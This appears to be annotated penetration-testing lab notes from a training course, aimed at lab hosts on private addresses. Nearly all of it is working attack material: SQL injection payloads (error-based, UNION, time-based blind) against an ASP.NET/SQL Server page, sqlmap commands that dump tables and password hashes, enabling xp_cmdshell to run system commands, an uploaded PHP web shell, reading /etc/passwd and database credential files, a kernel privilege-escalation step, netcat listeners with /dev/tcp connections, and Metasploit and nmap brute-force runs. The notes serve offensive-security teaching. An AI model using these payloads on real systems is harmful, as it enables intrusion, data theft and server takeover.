# SQL Injection #
#################
http://10.250.100.221/
http://10.250.100.221/bookdetail.aspx?id=2          (baseline - note which record comes back and how long the page takes)
http://10.250.100.221/bookdetail.aspx?id=2'         (unbalanced quote - a database error here means the value is concatenated into the query)
http://10.250.100.221/bookdetail.aspx?id='
http://10.250.100.221/bookdetail.aspx?id=(2)        (parentheses accepted and same record as id=2 - the value is not being treated as a plain string)
http://10.250.100.221/bookdetail.aspx?id=(4-2)      (same record as id=2 - the server evaluated the arithmetic)
http://10.250.100.221/bookdetail.aspx?id=(4-1)      (should return the id=3 record - confirms the parameter lands in a numeric SQL context, so no quote is needed in later payloads)
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--
NOTE: "N" just means keep incrementing until you run out of databases. This is error-based extraction: DB_NAME() returns a string, so SQL Server fails to convert it to the integer 1 and the database name is leaked inside the conversion error message. Once DB_NAME(N) returns NULL (no database with that id) the error stops, which is how you know you are done.
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
NOTE: char(85) is 'U', i.e. user tables. Each request leaks one table name in the conversion error; feed the last name you got into the name>'...' clause to walk to the next one.
http://10.250.100.221/bookdetail.aspx?id=2 order by 100--
http://10.250.100.221/bookdetail.aspx?id=2 order by 50--
http://10.250.100.221/bookdetail.aspx?id=2 order by 25--
http://10.250.100.221/bookdetail.aspx?id=2 order by 10--
http://10.250.100.221/bookdetail.aspx?id=2 order by 5--
http://10.250.100.221/bookdetail.aspx?id=2 order by 6--
http://10.250.100.221/bookdetail.aspx?id=2 order by 7--
http://10.250.100.221/bookdetail.aspx?id=2 order by 8--
http://10.250.100.221/bookdetail.aspx?id=2 order by 9--
NOTE: bisect until "order by N" succeeds and "order by N+1" errors. Here 9 works and 10 does not, so the original query has 9 columns and every UNION below must select exactly 9 values.
http://10.250.100.221/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
NOTE: id=-2 matches no real row, so the page renders the UNION row instead and the numbers that appear tell you which column positions are echoed to the screen.
http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
NOTE: reading password_hash from master.sys.sql_logins requires CONTROL SERVER permission - in practice the application's login being sysadmin. If that last query errors or shows nothing, the login is lower-privileged; record that either way, since an app login with sysadmin rights is a finding in its own right.
###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
NOTE: these payloads rely on stacked queries (the ";" after id=2), which SQL Server allows. Time a few normal requests first so you know the baseline latency; a "hit" is a response that takes roughly 10 seconds longer than baseline, not merely "slower", otherwise a busy server will be misread as a true condition. Re-send any borderline result before trusting it.
3 - Total Characters
http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
D - 1st Character
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
NOTE: only one "=" probe per position can delay; 100 is 'd'. (The original notes also marked the =97 probe as delayed, which contradicts the =100 result and has been corrected here.)
B - 2nd Character
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
O - 3rd Character
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
NOTE: the ">" probes are a binary search over the lowercase range (97..122) and need far fewer requests than testing every value with "=". Because >110 delayed, the character must be at least 111, so the final check is =111 ('o'); the original notes' "=110" could not have delayed. Result so far: USER = dbo.
##########
# Sqlmap #
##########
cd /home/strategicsec/toolz/sqlmap-dev/
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -b
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --current-user
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --current-db
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --dbs
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp --tables
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --users --passwords
NOTE: -b prints the DBMS banner. Keep the URL in double quotes so the shell does not interpret "?" or "&". --dump writes the table contents to sqlmap's output directory on your own machine; treat that directory as engagement evidence (it contains the client's data) and handle or delete it accordingly. --users/--passwords needs the same elevated privileges as the manual master.sys.sql_logins query above.
Enabling XP-Command Shell (in your web browser type the following URL)
http://10.250.100.221/bookdetail.aspx?id=2;exec master..sp_configure 'show advanced options',1;reconfigure;exec master..sp_configure 'xp_cmdshell',1;reconfigure--
NOTE: sp_configure/reconfigure needs the sysadmin role (or ALTER SETTINGS), so this only works because the application's login is over-privileged - write that up. It is a persistent change to the server's configuration, not to your session: log it, and revert it when you are finished:
http://10.250.100.221/bookdetail.aspx?id=2;exec master..sp_configure 'xp_cmdshell',0;reconfigure;exec master..sp_configure 'show advanced options',0;reconfigure--
##############################################
# Executing System Commands With xp_cmdshell #
##############################################
Go to the address below in firefox:
http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--
NOTE: xp_cmdshell output is not shown on the page. "ping -n 8" to localhost takes roughly 7 seconds, so a noticeably delayed response is the evidence that the command ran - the same trick as the WAITFOR delay above.
Go to the address below in firefox:
http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\dir_yourname-was-here.txt'--
Check it
-------
http://10.250.100.221/dir_yourname-was-here.txt
Repeat the same pattern for ipconfig and netstat (the original notes omit these two commands; e.g. 'ipconfig+/all+>+c:\inetpub\wwwroot\ipconfig_yourname-was-here.txt' and 'netstat+-an+>+c:\inetpub\wwwroot\netstat_yourname-was-here.txt'), then:
Check it
-------
http://10.250.100.221/ipconfig_yourname-was-here.txt
Check it
-------
http://10.250.100.221/netstat_yourname-was-here.txt
NOTE: anything redirected into the web root is readable by anyone who can reach the site, not just you. Use a unique file name, fetch it promptly, and delete the files (xp_cmdshell 'del c:\inetpub\wwwroot\*_yourname-was-here.txt') before the engagement ends. Being able to write there at all means the SQL Server service account has write access to wwwroot - a separate finding.
In order to perform union-based sql injection - we must first determine the numb
er of columns in this query.
We do this using ORDER BY:
http://10.250.100.115/acre2.php?lap=acer' order by 100-- +
Page returns the following error:
Unknown column '100' in 'order clause'
NOTE: that error text is MySQL's. In MySQL a "--" comment must be followed by whitespace, and browsers strip trailing spaces from a URL, so the payload ends with "+" (an encoded space) or a junk character such as "j" after the comment. Lower the ORDER BY number until the error disappears; the largest value that still works is the column count (6 here).
Now we "negate" the parameter value 'acer' by replacing it with null, so the original query matches no row and the UNION row is what gets rendered:
http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
We see that a 4 and a 5 are on the screen. These are the columns that will echo
back data
Now we build out the union all select statement with the correct number of colum
ns
Reference:
http://www.techonthenet.com/sql/union.php
Here we see that we do not have parameter passing, but we can see what we type (our input is reflected back in the page).
http://10.250.100.115/career.php
Tried XSS, but that didn't work - then noticed that we can upload a file.
Go to http://www.open-labs.org/
Download yourname_webkit
http://www.open-labs.org/yourname_webkit02.tar.gz
Upload cmd.php or list.php ... now you have to find where the upload landed. Where is it?
Tried a bunch of dirs - finally found it in /resume:
http://10.250.100.115/resume/cmd.php
NOTE: an upload form that accepts a .php file and stores it under the web root is remote code execution as the web server user. Whatever you upload stays on the target - record the path and remove the files at the end of the engagement.
Try the following commands:
/sbin/ifconfig
uname -a
id
cat /etc/passwd
Here we see parameter passing, but this one is actually a "yes" to question number 3 of the checklist (does the parameter reference a file?) - a file-inclusion / path-traversal candidate rather than SQL injection:
http://10.250.100.115/showfile.php?filename=about.txt
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --current-db -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --privileges -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --dbs -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --tables -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/issue -v 3
python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
NOTE: --file-read goes through MySQL's LOAD_FILE(), so it only works when --privileges shows the database user holds the FILE privilege (and the server's secure_file_priv setting does not restrict the path) - run --privileges first for that reason. -v 3 prints the payloads sqlmap sends, which is what you want in the write-up.
###################################
# Root Method 1: Find Credentials #
###################################
http://10.250.100.115/resume/cmd.php
ls -lsa
ls -lsa /var/www/html/
Find a file called dbconnect.php
cat /var/www/html/dbconnect.php
or
http://10.250.100.115/showfile.php?filename=dbconnect.php
#######################################
# Root Method 2: Privilege Escalation #
#######################################
start listener on your machine
ncat -l -v -p 1234
cd /tmp
http://www.exploit-db.com/exploits/9479/
NOTE: this is a local kernel privilege-escalation exploit. Compare the target's "uname -a" output (gathered through cmd.php above) with the kernel versions listed on the exploit page before running it; kernel exploits can panic the host, so get the client's go-ahead and a snapshot/backup first. /tmp is used because it is normally writable by the web server user; if the target has no compiler, build the exploit on a matching system and upload the binary.
Linux Lab 1:
-----------
On your Windows host type this:
ncat -l -vv -p 4321 > see.txt
On your Linux host type this:
echo "see this" > /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/4321
NOTE: /dev/tcp/HOST/PORT is a bash built-in pseudo-device, not a real file - run it from bash, not sh/dash. Replace the placeholder with the IP of the host running ncat.
Linux Lab 2:
-----------
On your Windows host type this:
ncat -l -vv -p 1234
Linux Lab 3:
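# Linux Lab 3: TCP connect scan of ports 1-1023 on the target using bash's
# /dev/tcp pseudo-device - handy on a foothold box with no nmap. Must run
# under bash (/dev/tcp does not exist in sh/dash). Needs coreutils 'timeout'.
target=${1:-10.250.100.221}
out=/tmp/ports.txt
: > "$out"   # start fresh; the original appended, so re-runs mixed old and new results
port=1
while [ "$port" -lt 1024 ]; do
  # Without a timeout a filtered port blocks for the kernel's full SYN-retry
  # period (minutes per port), which makes a 1023-port sweep impractical.
  # "Connection refused" noise from closed ports goes to /dev/null.
  if timeout 1 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null; then
    echo "$port is open" >> "$out"
  fi
  port=$((port + 1))
done
cat "$out"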
Lab 4:
-----
On your Windows host type this:
ncat -l -vv -p 31337
ncat -l -vv -p 1337
Type commands on the 31337 listener, and see the output on the 1337 listener
(The Linux-side command is not in these notes; the idea is a shell on the target that reads commands from one /dev/tcp connection and writes its output to the other.)
./msfconsole
use auxiliary/admin/mssql/mssql_sql
show options
set RHOST 10.250.100.221
set username sa
set password database
exploit
use auxiliary/admin/mssql/mssql_enum
show options
set RHOST 10.250.100.221
set username sa
set password database
exploit
use auxiliary/admin/mssql/mssql_exec
show options
set RHOST 10.250.100.221
set username sa
set password database
set CMD cmd.exe /c ping localhost
exploit
NOTE: username is set explicitly here for consistency with the mssql_sql and mssql_enum runs above (the module's default is sa anyway). mssql_exec runs the command through xp_cmdshell, so the same caveat applies as for the browser method: check whether the setting was left enabled and revert it afterwards.
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 10.250.100.221
run
use auxiliary/admin/mssql/mssql_enum
set RHOSTS 10.250.100.221
run
set CMD
run
ipconfig
MS-SQL
nmap -sV -p 1433 --script=ms-sql-info 10.250.100.221
nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=userlist.txt,passdb=passwordlist.txt 10.250.100.221
nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database 10.250.100.221
NOTE: ms-sql-info needs no credentials, so run it first. ms-sql-brute sends one login attempt per user/password pair; against an instance with an account-lockout policy (or domain accounts) it can lock out real users, so keep the lists short and confirm the rules of engagement before running it.
MySQL